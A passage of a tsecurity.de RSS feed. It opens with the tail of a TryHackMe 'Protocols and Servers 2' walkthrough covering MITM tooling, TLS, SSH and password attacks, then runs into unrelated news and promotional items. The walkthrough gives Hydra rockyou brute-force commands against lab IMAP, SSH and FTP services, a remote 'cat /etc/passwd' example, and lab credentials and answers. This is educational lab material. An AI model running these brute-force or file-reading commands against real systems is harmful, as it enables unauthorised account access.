“Airport_WiFi_Free”) that route every connected victim’s traffic through the attacker.</li><li><strong>BGP hijacking </strong>— announcing false routes at the internet’s routing layer to reroute traffic for whole organizations or regions.</li></ul><h4>The tooling</h4><ul><li><strong>Bettercap </strong>— the modern, actively maintained successor to Ettercap. Handles ARP/DNS spoofing, HTTP/HTTPS proxying, and is modular.</li><li><strong>Ettercap</strong> — the classic LAN MITM tool. It still works, but Bettercap is generally preferred today.</li><li><strong>mitmproxy </strong>— an interactive HTTPS proxy used for inspecting and modifying web traffic on the fly.</li><li><strong>Responder </strong>—<strong> </strong>Windows-focused<strong>.</strong> Abuses fallback name-resolution protocols (LLMNR, NBT-NS) that kick in when DNS fails, answering with its own IP to capture authentication hashes. A staple of internal Active Directory pentests.</li></ul><h4>MITM against encrypted traffic</h4><p>Encryption raises the bar, but it isn’t a magic shield:</p><ul><li><strong>SSL stripping</strong> — quietly downgrade the victim’s connection to plain HTTP while the attacker keeps an HTTPS link to the real server. This is easy to miss if the user never typed <em>“https://”</em> or didn’t check for the padlock icon.</li><li><strong>Fake certificates</strong> — present your own certificate and run two separate encrypted legs. This works if the victim blindly clicks through the browser warning or if a Certificate Authority is compromised.</li><li><strong>Compromised or rogue CAs </strong>— the most serious case. If an attacker controls a trusted CA, they can mint valid-looking certificates for absolutely any domain.</li></ul><h4>Modern defenses</h4><p>A decade of security hardening makes MITM much harder now:</p><ul><li><strong>HTTPS by default</strong> (browsers flag plain HTTP as “Not Secure”)</li><li><strong>HSTS</strong> (forces HTTPS and blocks stripping attacks)</li><li><strong>Certificate Transparency</strong> (public, auditable logs of all issued certificates)</li><li><strong>Certificate pinning</strong> (apps accept only specific, hardcoded keys)</li><li><strong>DANE</strong> (publishing certificate info in DNSSEC-signed DNS)</li></ul><p>MITM still succeeds when users ignore certificate warnings, apps validate keys poorly, the target speaks cleartext, or legacy gear lacks modern features.</p><p>The fundamental fix remains the same: cryptography. You need authentication plus encryption/signing, which is exactly what properly implemented TLS provides.</p><p><strong>Question 1:</strong> How many interfaces does Ettercap offer?</p><pre>Answer: 3</pre><p><strong>Question 2:</strong> How many ways can you invoke Bettercap?</p><pre>Answer: 3</pre><h3>Part 3 — TLS: The Fix for Both Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/622/1*3Qn-dR4Ps9kwTxZGqRBBHw.jpeg"></figure><p>Both sniffing and MITM share one cure: TLS (Transport Layer Security). This part of the room is the solution chapter.</p><h4>A quick history</h4><p>SSL appeared in 1994 via Netscape, with SSL 3.0 dropping in 1996 as the web grew into shopping and payments. TLS succeeded it in 1999.</p><p>Where things stand now:</p><ul><li>SSL 2.0 and 3.0 are deprecated and highly insecure. Never use them.</li><li>TLS 1.0 and 1.1 were officially deprecated in 2021 and dropped by major browsers.</li><li>TLS 1.2 (from 2008) is still widely used and secure when configured with modern ciphers.</li><li>TLS 1.3 (from 2018) is the current standard. It features fewer algorithms, a faster handshake, and forward secrecy by default.</li></ul><p>People still say “SSL certificate” out of habit, but in practice, everything modern uses TLS.</p><h4>Where TLS sits</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Q9wEkyyAKPn28lVN9bDX2Q.png"><figcaption>Image 2 from the room</figcaption></figure><p>Cleartext application-layer protocols send data entirely in the open.</p><p>TLS adds encryption just below the application protocol, wrapping its data before it hits the network card. On the OSI model, it lives right between the transport and application layers.</p><h4>Upgrading protocols with TLS</h4><ul><li>HTTP (Port 80) upgrades to HTTPS (Port 443)</li><li>FTP (Port 21) upgrades to FTPS (Port 990)</li><li>SMTP (Port 25) upgrades to SMTPS (Port 465)</li><li>POP3 (Port 110) upgrades to POP3S (Port 995)</li><li>IMAP (Port 143) upgrades to IMAPS (Port 993)</li></ul><p>It’s not just web and mail. DNS can be wrapped too via DoT (DNS over TLS) on port 853, or DoH (DNS over HTTPS) on port 443. Both stop eavesdroppers from seeing which sites you look up.</p><h4>Implicit TLS vs STARTTLS</h4><ul><li>Implicit TLS uses a dedicated port that is fully encrypted from the very first byte (like 443 or 993).</li><li>STARTTLS connects in cleartext on the normal port, then issues a “STARTTLS” command to upgrade the connection in place. This is common for email setup.</li></ul><blockquote>Both offer encryption, but implicit TLS is highly preferred.</blockquote><p>A MITM attacker can easily strip the STARTTLS command during negotiation and force the session to stay in cleartext if the client isn’t configured to require it.</p><h4>How HTTPS works</h4><p>Plain HTTP takes two steps: open a TCP connection, then send requests. HTTPS inserts a step in between:</p><ol><li>Establish a standard TCP connection.</li><li>Establish a TLS connection (the handshake).</li><li>Send the HTTP requests, which are now fully encrypted.</li></ol><p>A simplified TLS 1.2 handshake goes like this:</p><blockquote><strong>ClientHello</strong> (client offers its TLS versions and cipher suites) <strong>→</strong> <strong>ServerHello</strong> (server picks the parameters and sends its certificate) <strong>→ Key Exchange</strong> (both derive a shared secret)<strong> →</strong> <strong>Finished</strong> (both confirm and switch to encrypted communication):</blockquote><pre>ClientHello → ServerHello → Key Exchange → Finished</pre><h4>Certificates and trust</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/980/1*-10wNzrM0tEpRINoAqc5mQ.png"><figcaption>Certificate Authority (CA)</figcaption></figure><p>HTTPS leans on certificates signed by trusted Certificate Authorities (CAs). Your browser expects a valid certificate from a trusted CA, which proves you’re talking to the real server and blocks easy MITM attempts.</p><p>A certificate shows who it was issued to, who issued it, and its validity period. An expired certificate should never be trusted.</p><p>The modern ecosystem made this nearly universal thanks to automated platforms like <a href="https://letsencrypt.org/"><em>Let’s Encrypt</em></a>, which pushed global HTTPS traffic past 95%.</p><p><strong>Question:</strong> What is the three-letter acronym for the DNS protocol that uses TLS?</p><pre>Answer: DoT (DNS over TLS)</pre><h3>Part 4 — SSH: Secure Remote Administration</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/920/1*EidIDqyfQGBr2l3Y-KLmog.png"><figcaption>SSH</figcaption></figure><p>SSH (Secure Shell) is the secure replacement for Telnet. It is the universal way to administer servers, network gear, and cloud infrastructure.</p><p>The “S” means you can confirm the server’s identity, your messages are encrypted for the intended recipient only, and any data tampering is instantly detectable.</p><blockquote>It handles confidentiality and integrity seamlessly over port 22.</blockquote><h4>Authentication methods</h4><ul><li><strong>Password </strong>— The simplest method. The password rides the encrypted channel, but weak choices can still fall to brute-force attacks.</li><li><strong>Public key (recommended) </strong>— A private key stays on your machine, while the public key goes on the server. The server challenges you to prove you hold the private key without ever transmitting it.</li><li><strong>Certificate-based </strong>— An SSH CA signs user and host keys. This scales incredibly well because you don’t have to manually distribute public keys to every single server.</li><li><strong>MFA </strong>— Combines a traditional key or password with a one-time code for high-security environments.</li></ul><h4>Connecting</h4><ul><li>To connect, you run:</li></ul><pre>ssh mark@MACHINE_IP</pre><p>Enter the password or let your key authenticate, and you are on the remote terminal. Every single command you send runs over an encrypted channel.</p><p><strong>Question:</strong> Connect as mark (password XBtc49AB) and find the kernel release with uname -r.</p><pre>Commands: ssh mark@MACHINE_IP uname -r</pre><pre>Answer: 5.15.0–119-generic</pre><h4>Host key verification</h4><p>On your very first connection, SSH shows the server’s key fingerprint and asks if you want to continue.</p><p>Ideally, you verify this fingerprint through an admin or config management before typing “yes”. It is then saved in your local known_hosts file.</p><p>If that key ever changes unexpectedly in the future, SSH throws a massive warning, a major indicator of a potential MITM attack or a reinstalled server.</p><h4>Generating keys</h4><ul><li>To create a new key pair, run:</li></ul><pre>ssh-keygen -t ed25519 -C "your_email@example.com"</pre><p>The private key stays strictly on your machine and should be passphrase-protected. The public key (.pub) is safe to share. You can push it to a remote server easily using:</p><pre>ssh-copy-id mark@MACHINE_IP</pre><h4>Useful options</h4><pre>+--------------------------------------------+------------------------------------------------------------+<br>| Command                                    | Purpose                                                    |<br>+--------------------------------------------+------------------------------------------------------------+<br>| ssh -p 2222 mark@MACHINE_IP                | Connect to a remote server running on a non-standard port   |<br>| ssh -i ~/.ssh/custom_key mark@MACHINE_IP   | Specify a specific private key file to use for login       |<br>| ssh -J bastion.example.com mark@internal   | Jump through a secure bastion host to reach an internal IP |<br>| ssh -L 8080:localhost:80 mark@MACHINE_IP   | Set up a local port forward to tunnel traffic through SSH  |<br>| ssh -D 9050 mark@MACHINE_IP                | Create a dynamic SOCKS proxy forward for traffic routing   |<br>| ssh mark@MACHINE_IP "cat /etc/passwd"      | Run a single, one-off command without opening a full shell |<br>+--------------------------------------------+------------------------------------------------------------+</pre><h4>Secure file transfer</h4><ul><li><strong>SFTP</strong> — Interactive, FTP-like file management running completely over SSH. This is the recommended choice today.</li><li><strong>SCP </strong>— Simple file copies over SSH. This is now deprecated by OpenSSH in favor of SFTP, though it still works on most systems.</li><li><strong>rsync over SSH </strong>— The best option for large or repeated transfers because it only copies the specific parts of files that changed.</li></ul><p>To copy files via SCP:</p><pre>scp mark@MACHINE_IP:/home/mark/archive.tar.gz ~/ (remote to local)</pre><pre>scp backup.tar.bz2 mark@MACHINE_IP:/home/mark/ (local to remote)</pre><p><strong>Quick clarifier:</strong></p><blockquote>SFTP runs over SSH (port 22).</blockquote><blockquote>FTPS is FTP-over-TLS (port 990).</blockquote><p>They are entirely different protocols despite having similar names.</p><p><strong>Question:</strong> Download book.txt from the remote system; what download size did scp display in KB?</p><pre>Command: scp mark@MACHINE_IP:/home/mark/book.txt ~/</pre><pre>Answer: 415</pre><h4>Hardening SSH</h4><p>To protect a server, you can modify its config file <em>(/etc/ssh/sshd_config)</em>:</p><ul><li>Set PasswordAuthentication to “no” once public keys are established.</li><li>Set PermitRootLogin to “no” to force users to log in with regular accounts first.</li><li>Use AllowUsers or AllowGroups to create an explicit access whitelist.</li><li>Change the default port to reduce automated log noise.</li><li>Deploy fail2ban to automatically block IPs with repeated failed login attempts.</li></ul><h3>Part 5 — Password Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6_lWVwmNlB93-2JkYWo8Og.png"></figure><p>Even with a network fully encrypted, authentication remains a primary target. Authentication is simply the act of proving your identity, like entering a password to access a service.</p><p>The three factors:</p><ul><li><strong>Something you know </strong>— a password or PIN</li><li><strong>Something you have </strong>— a phone, hardware security key, or smart card</li><li><strong>Something you are </strong>— a fingerprint or facial scan</li></ul><p>This section focuses entirely on attacking “something you know.”</p><h4>Why weak passwords persist</h4><p>Massive historic breaches show that old habits die hard.</p><p>The most common passwords found in modern breaches still include variations like 123456, password, qwerty, Password1, and seasonal choices like Summer2024.</p><p>Because people constantly reuse passwords across multiple sites, a single leak frequently gives attackers access to entirely unrelated corporate or personal accounts.</p><h4>Types of attacks</h4><ul><li><strong>Guessing </strong>— using personal info like a target’s pet, birth year, or favorite sports team harvested from social media.</li><li><strong>Dictionary</strong>— automatically trying lists of real words and common variations.</li><li><strong>Brute force </strong>— systematically trying every possible characters combination. This is exhaustive, which is why password length matters so much.</li><li><strong>Credential stuffing</strong> — taking leaked username/password pairs from old breaches and automatically testing them against other web services.</li><li><strong>Password spraying </strong>— testing one or two incredibly common passwords against a massive list of user accounts to dodge lockout policies.</li><li><strong>Hybrid</strong> — combining dictionary words with systematic patterns, like capitalizing the first letter and adding a year to the end.</li></ul><h4>Wordlists</h4><ul><li>The classic go-to wordlist is RockYou, located on the TryHackMe AttackBox at:</li></ul><pre>/usr/share/wordlists/rockyou.txt</pre><blockquote>Beyond that, security professionals use collections like SecLists, CrackStation lists, or custom-generated lists tailored specifically to the target’s language, region, or industry habits.</blockquote><h4>THC Hydra</h4><p>Hydra is a fast network login cracker that throws wordlists at live services like FTP, POP3, IMAP, SSH, and HTTP.</p><p>The basic syntax looks like this:</p><pre>hydra -l username -P wordlist.txt server service</pre><ul><li>-l specifies a single username (-L for a text file of names)</li><li>-P specifies a password wordlist (-p for a single password)</li><li>server is the target IP or hostname</li><li>service is the protocol you are targeting</li></ul><p>Examples:</p><pre>hydra -l mark -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp<br>hydra -l frank -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh<br>hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><p>Handy options include -s to target a non-default port, -vV for detailed verbosity, -t to adjust parallel attack threads, and -f to immediately stop execution when the first valid password is found.</p><h4>Other tools</h4><p>Alternative online crackers include <strong>Medusa</strong> and <strong>Ncrack</strong>.</p><p>For Windows and Active Directory environments, tools like <strong>NetExec</strong> excel at spraying credentials over SMB and LDAP.</p><p>If you manage to dump password hashes from a database, offline tools like <strong>Hashcat</strong> or <strong>John the Ripper </strong>are used because they can guess millions of combinations per second without worrying about network lag or lockouts.</p><h4>Mitigation</h4><p>Defending against password attacks requires a modern approach to identity management:</p><ul><li>Enforce <strong>length-first password policies</strong> based on NIST guidelines. Favor overall length over complex character rotation, and check new passwords against lists of known compromised credentials.</li><li>Implement <strong>strict account lockout</strong> or <strong>throttling mechanisms</strong> to kill automated automated guessing, while remaining aware of password spraying patterns.</li><li>Use <strong>CAPTCHAs</strong> to prevent basic bot execution on login forms.</li><li>Deploy <strong>Multi-Factor Authentication (MFA)</strong> across all external endpoints.</li><li>Transition toward <strong>passwordless ecosystems</strong>, utilizing passkeys (FIDO2/WebAuthn), hardware keys, or verified magic links.</li></ul><p><strong>Question: </strong>One email account is lazie; what password accesses the IMAP service?</p><pre>Command: hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><pre>Answer: butterfly</pre><h3>Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*35eDunQG0NLCy_K2XVOvtA.jpeg"></figure><p>The fundamental rule of network security is simple:</p><blockquote>Cleartext protocols are inherently insecure.</blockquote><p>Anything sent without encryption can be effortlessly intercepted by sniffing or manipulated via a Man-in-the-Middle attack.</p><p>The security path forward is uniform across all services:</p><ul><li>Use HTTPS instead of HTTP</li><li>Use SSH instead of Telnet</li><li>Use SFTP or FTPS instead of basic FTP</li><li>Use IMAPS, POP3S, and SMTPS instead of their legacy cleartext variants</li></ul><p>Even when a connection is perfectly encrypted, weak passwords remain a glaring vulnerability.</p><p>Secure the protocol with robust encryption, then secure the account with long passwords, rate limiting, and multi-factor authentication.</p><h4>Quick Port Reference Guide</h4><pre>+-------------------+------+----------------+<br>| Protocol          | Port | Security       |<br>+-------------------+------+----------------+<br>| FTP               | 21   | Cleartext      |<br>| FTPS              | 990  | TLS (implicit) |<br>| HTTP              | 80   | Cleartext      |<br>| HTTPS             | 443  | TLS (implicit) |<br>| IMAP              | 143  | Cleartext      |<br>| IMAPS             | 993  | TLS (implicit) |<br>| POP3              | 110  | Cleartext      |<br>| POP3S             | 995  | TLS (implicit) |<br>| SMTP              | 25   | Cleartext      |<br>| SMTP submission   | 587  | STARTTLS       |<br>| SMTPS             | 465  | TLS (implicit) |<br>| SSH / SFTP        | 22   | Encrypted (SSH)|<br>| Telnet            | 23   | Cleartext      |<br>+-------------------+------+----------------+</pre><p><em>Room: Protocols and Servers 2 — TryHackMe (</em><a href="https://tryhackme.com/room/protocolsandservers2"><em>https://tryhackme.com/room/protocolsandservers2</em></a><em>). This writeup is for educational purposes; only test systems you’re authorized to. Have fun!</em></p><p><em>This article was written by Pop123 as a walkthrough for the TryHackMe lab. I am as always open to further discussing the topic.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=42c2d01f5c6c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/protocols-and-servers-2-tryhackme-writeup-42c2d01f5c6c">Protocols and Servers 2 TryHackMe Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 2 Spoilers: Juliette’s Memories Could Change Everything]]></title>
<description><![CDATA[Silo Season 3 Episode 2 is already one of the most anticipated Apple TV episodes this week, mainly because Juliette’s memory loss has changed the direction of the story after her return to Silo 18. Season 3 premiered on July 3, 2026, and Episode 2 arrives on July 10, 2026.



Related: Silo Season...]]></description>
<link>https://tsecurity.de/de/3645595/ios-mac-os/silo-season-3-episode-2-spoilers-juliettes-memories-could-change-everything/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645595/ios-mac-os/silo-season-3-episode-2-spoilers-juliettes-memories-could-change-everything/</guid>
<pubDate>Sat, 04 Jul 2026 18:10:01 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 2 is already one of the most anticipated Apple TV episodes this week, mainly because Juliette’s memory loss has changed the direction of the story after her return to Silo 18. Season 3 premiered on July 3, 2026, and Episode 2 arrives on July 10, 2026.



Related: Silo Season 3 Episode 1 Ending Explained: Why Juliette Can’t Remember



The new season continues after the rebellion, but the real twist is Juliette’s condition. She survived her forced cleaning, yet she returns without clear memories, which gives Robert Sims and Camille more room to control the story inside the silo.



Silo Season 3 Episode 2 Could Push Juliette Toward a Dangerous Truth



Spoilers ahead for Silo Season 3 Episode 1.



Juliette is back, but she is not fully herself. Her missing memories make her weaker in front of people who want power, but small flashes from the past can still lead her back to the truth.



Episode 2 is expected to build on this confusion. The biggest tension now is whether Juliette can remember what happened with Bernard, what she saw outside, and why the silo is still hiding so much from its own people.



Season 3 also opens the door to the “Before Times,” showing events from centuries earlier. This storyline follows journalist Helen Drew and Congressman Daniel Keene as they uncover a conspiracy tied to the creation of the silos.



Related: Silo Season 3 Cast Guide: Who Are the New Characters?



That twist makes Episode 2 more important because the show is no longer only about survival underground. It is also about why the world reached this point in the first place.



What Makes Episode 2 So Important?



Episode 2 can move the story in three key directions:



• Juliette may start questioning the version of events being fed to her.



• Sims and Camille may tighten their grip on Silo 18.



• The flashback timeline may reveal more about the original plan behind the silos.



The season has 10 episodes, with new episodes releasing weekly on Fridays until September 4, 2026.



FAQs



When will Silo Season 3 Episode 2 release? Silo Season 3 Episode 2 will release on Friday, July 10, 2026, on Apple TV.  How many episodes are in Silo Season 3? Silo Season 3 has 10 episodes. Apple TV is releasing one new episode every week.  What is the main twist in Silo Season 3? The main twist is Juliette’s memory loss after surviving her forced cleaning. The season also adds a major origin story set centuries before the present timeline.  Is Silo Season 3 connected to the books? Yes, Silo is based on Hugh Howey’s books, and Season 3 uses material linked to Shift and Dust while also expanding parts of the story for TV.  



Silo Season 3 Episode 2 looks ready to deepen the mystery around Juliette, Silo 18, and the origin of the underground world. 



Apple TV costs $12.99 per month in the US. What do you plan to watch next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[MacStories Weekly: Issue 520]]></title>
<description><![CDATA[This week, in addition to the usual links, app debuts, and recap of MacStories' articles and podcasts:Movie Buzz, by JonathanA System for Surviving Email, by JohnSpeech Recognition Tips, by Jonathan
	
						This Story is for Club Members

				Get weekly newsletters, exclusive stories, member down...]]></description>
<link>https://tsecurity.de/de/3644103/ios-mac-os/macstories-weekly-issue-520/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644103/ios-mac-os/macstories-weekly-issue-520/</guid>
<pubDate>Fri, 03 Jul 2026 19:12:13 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<nav class="ms-issue-toc"><p>This week, in addition to the usual links, app debuts, and recap of MacStories' articles and podcasts:</p><ul><li><a href="https://www.macstories.net/club/macstories-weekly-issue-520/#movie-buzz" class="ms-issue-toc-item">Movie Buzz, by Jonathan</a></li><li><a href="https://www.macstories.net/club/macstories-weekly-issue-520/#a-system-for-surviving-email" class="ms-issue-toc-item">A System for Surviving Email, by John</a></li><li><a href="https://www.macstories.net/club/macstories-weekly-issue-520/#speech-recognition-tips" class="ms-issue-toc-item">Speech Recognition Tips, by Jonathan</a></li></ul></nav>
	<div class="club-notice-restricted plan-">
						<h2>This Story is for Club Members</h2>

				<p>Get weekly newsletters, exclusive stories, member downloads, and ad-free version of MacStories Unwind.</p>
				<p><br><a href="https://www.macstories.net/plans?utm_source=ms&amp;utm_medium=web" class="button">See Plans</a></p>

									 

					<p>Already a member? <a href="https://www.macstories.net/?memberful_endpoint=auth">Sign in</a></p>
								</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[As Sony revokes digital licenses and Xbox hints at a discless future — I'm saying a sad farewell to physical software, midnight launches, and second-hand game savings]]></title>
<description><![CDATA[Physical games are fading as Sony pulls digital licenses and Xbox eyes a discless future, ending second‑hand savings and my happy memories of midnight launches.]]></description>
<link>https://tsecurity.de/de/3641078/windows-tipps/as-sony-revokes-digital-licenses-and-xbox-hints-at-a-discless-future-im-saying-a-sad-farewell-to-physical-software-midnight-launches-and-second-hand-game-savings/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641078/windows-tipps/as-sony-revokes-digital-licenses-and-xbox-hints-at-a-discless-future-im-saying-a-sad-farewell-to-physical-software-midnight-launches-and-second-hand-game-savings/</guid>
<pubDate>Thu, 02 Jul 2026 14:13:08 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Physical games are fading as Sony pulls digital licenses and Xbox eyes a discless future, ending second‑hand savings and my happy memories of midnight launches.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ninja's gone green — and blue, and oat-colored — with three new colors for one of its best coffee machines]]></title>
<description><![CDATA[Oat, Vista Green, or Midnight Blue — which one will you pick?]]></description>
<link>https://tsecurity.de/de/3640690/it-nachrichten/ninjas-gone-green-and-blue-and-oat-colored-with-three-new-colors-for-one-of-its-best-coffee-machines/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640690/it-nachrichten/ninjas-gone-green-and-blue-and-oat-colored-with-three-new-colors-for-one-of-its-best-coffee-machines/</guid>
<pubDate>Thu, 02 Jul 2026 11:47:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Oat, Vista Green, or Midnight Blue — which one will you pick?]]></content:encoded>
</item>
<item>
<title><![CDATA[Surviving the Data Science Behavioral Interview]]></title>
<description><![CDATA[In the age of AI, standing out here means a lot more than ever. Here are three tips to walk into your next interview with confidence.
The post Surviving the Data Science Behavioral Interview appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3636047/ai-nachrichten/surviving-the-data-science-behavioral-interview/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636047/ai-nachrichten/surviving-the-data-science-behavioral-interview/</guid>
<pubDate>Tue, 30 Jun 2026 17:04:35 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In the age of AI, standing out here means a lot more than ever. Here are three tips to walk into your next interview with confidence.</p>
<p>The post <a href="https://towardsdatascience.com/surviving-the-data-science-behavioral-interview/">Surviving the Data Science Behavioral Interview</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Steve Ballmer once called Linux a “cancer” — it's funny Windows 10 holdouts may now see it as the cure for Windows 11’s hardware rules and the RAM crisis]]></title>
<description><![CDATA[Microsoft once dismissed Linux, but today it’s becoming the lifeline for Windows 10 users facing performance and RAM challenges.]]></description>
<link>https://tsecurity.de/de/3635876/windows-tipps/steve-ballmer-once-called-linux-a-cancer-its-funny-windows-10-holdouts-may-now-see-it-as-the-cure-for-windows-11s-hardware-rules-and-the-ram-crisis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635876/windows-tipps/steve-ballmer-once-called-linux-a-cancer-its-funny-windows-10-holdouts-may-now-see-it-as-the-cure-for-windows-11s-hardware-rules-and-the-ram-crisis/</guid>
<pubDate>Tue, 30 Jun 2026 16:12:30 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft once dismissed Linux, but today it’s becoming the lifeline for Windows 10 users facing performance and RAM challenges.]]></content:encoded>
</item>
<item>
<title><![CDATA[Call of Duty Black Ops 7 on macOS: Cloud Streaming and Meta Domination]]></title>
<description><![CDATA[Playing Call of Duty on a Mac used to be a joke, but Black Ops 7 changes that. Running Call of Duty Black Ops 7 on macOS is now possible, but only with the right setup. Whether you are jumping into large-scale matches or grinding weapon progression, you need a stable setup if you want to keep up ...]]></description>
<link>https://tsecurity.de/de/3635689/ios-mac-os/call-of-duty-black-ops-7-on-macos-cloud-streaming-and-meta-domination/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635689/ios-mac-os/call-of-duty-black-ops-7-on-macos-cloud-streaming-and-meta-domination/</guid>
<pubDate>Tue, 30 Jun 2026 15:10:48 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Playing Call of Duty on a Mac used to be a joke, but Black Ops 7 changes that. Running Call of Duty Black Ops 7 on macOS is now possible, but only with the right setup. Whether you are jumping into large-scale matches or grinding weapon progression, you need a stable setup if you want to keep up with players on Windows. 



If your Mac setup is already sorted but you are not sure what to do after the campaign, read what to do in the endgame part in CoD BO7 on Skycoach blog for a clear breakdown of the current tactical meta, loadout priorities, and post-campaign progression. A lot of players hit a wall when they move from the story into BO7’s more competitive modes, so knowing how to build your first proper loadouts and where to focus your progression makes a real difference before you jump into live lobbies.



Running the Game: Cloud Streaming vs Translation Layers



Apple silicon has completely changed the hardware landscape. The M1, M2, and the newer M4 chips have incredible raw compute power, but the primary issue with running BO7 natively is software compatibility. Call of Duty's proprietary anti-cheat engine, Ricochet, famously hates translation layers like CrossOver or Parallels. Trying to force the game to run natively usually results in instant client crashes or, even worse, unexpected account flags that can lead to shadowbans.



Because of this strict anti-cheat environment, the Mac gaming community has almost entirely pivoted to cloud streaming. For most players, GeForce NOW Ultimate is currently the most reliable way to play the game on a MacBook Air, MacBook Pro, or Mac Mini without wrecking the overall experience. If you are playing over a Wi-Fi 6E network or using a dedicated wired ethernet connection, you can comfortably play at 1440p and get up to 120 FPS. The input delay is barely noticeable, meaning you can still snap to targets in Team Blueprint Sharpshooter or track fast-moving enemies across the rooftops of the new Zenith multiplayer map.



Surviving the Sweaty Lobbies and Meta Builds



Once you get your technical setup sorted out, the actual game demands a massive time investment. The multiplayer lobbies in 2026 are incredibly unforgiving. Most players already have optimized loadouts, and if you queue with base weapons, you will lose fights simply because you lack the right attachments.



That is exactly why so many players are looking for a reliable CoD BO7 boost right now. Unlocking the best attachments for meta assault rifles takes dozens of hours of repetitive grinding, often with underleveled weapons that put you at a clear disadvantage. For players with a full-time job who just want to log in on the weekend and actually enjoy the game, handing off that grind makes perfect sense. An experienced player handles the dull progression work, so when you finally log in on your Mac, your loadouts are ready and you can jump straight into real matches.



Zombies and the Tedious Camo Grind



The new round-based Zombies experience set in Kowakujō is another massive time sink. Fighting your way through a Japanese feudal castle while dealing with new Hellhound variants and the electrified Oni enemies requires deep map knowledge and fully upgraded Wonder Weapons. The mastery camos specific to the Zombies mode look incredible, but unlocking them forces you to complete highly specific, tedious challenges over and over again. You are often required to farm thousands of critical kills with weapons that are terrible for crowd control.



Instead of repeating the same Easter Egg steps over and over, many players use a Call of Duty Black Ops 7 boost to secure rare cosmetics and clear Dark Aether challenges faster.



Competitive Ranked and Avoiding the Teammate Lottery



For the players who genuinely care about their seasonal rank, the competitive playlist is a brutal environment. The skill-based matchmaking algorithms ensure that every single match feels like a grand finals tournament. Trying to climb out of the lower divisions with uncoordinated teammates is a miserable experience. You will constantly deal with people leaving the match early, refusing to use their microphones, or completely ignoring the Hardpoint rotations to chase meaningless kills.



A CoD BO7 boosting service takes most of that teammate lottery out of the equation. You can either have a highly ranked professional pilot your account to your desired division, or you can group up with them directly in a carry service. Playing with genuinely strong teammates makes the mode feel completely different. They manage the objective, call spawn flips early, and lock down key lanes, so the match stops feeling like chaos and starts feeling playable.



The whole Call of Duty Black Ops 7 boosting process is built to fit around your schedule. You dictate the exact goals - whether it is unlocking the new Champion's Quest rewards in Warzone, finishing the chaotic Operation King Killer in the 32-player Endgame mode, or just maxing out your prestige levels. The pros handle the grind safely, so you can boot up your Mac, connect your controller, and get straight to the parts of BO7 you actually care about.]]></content:encoded>
</item>
<item>
<title><![CDATA[Buying a Mattress in 2026? We Tested 100+ and These Were the Standouts]]></title>
<description><![CDATA[WIRED has tested 100-plus bed-in-a-box mattresses for a week each. Our top pick, the Helix Midnight Luxe hybrid, is the best bed you can buy online.]]></description>
<link>https://tsecurity.de/de/3634062/it-nachrichten/buying-a-mattress-in-2026-we-tested-100-and-these-were-the-standouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634062/it-nachrichten/buying-a-mattress-in-2026-we-tested-100-and-these-were-the-standouts/</guid>
<pubDate>Mon, 29 Jun 2026 23:17:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WIRED has tested 100-plus bed-in-a-box mattresses for a week each. Our top pick, the Helix Midnight Luxe hybrid, is the best bed you can buy online.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsofts Midnight Blizzard Cloud-Hack und die Schatten-ITBorns IT - BornCity]]></title>
<description><![CDATA[Die Hacker der staatlichen Gruppe Midnight Blizzard-Hacker durchforsteten gezielt Nachrichten von Führungskräften oder Sicherheitsexperten in ...]]></description>
<link>https://tsecurity.de/de/3630338/it-security-nachrichten/microsofts-midnight-blizzard-cloud-hack-und-die-schatten-itborns-it-borncity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630338/it-security-nachrichten/microsofts-midnight-blizzard-cloud-hack-und-die-schatten-itborns-it-borncity/</guid>
<pubDate>Sun, 28 Jun 2026 01:22:02 +0200</pubDate>
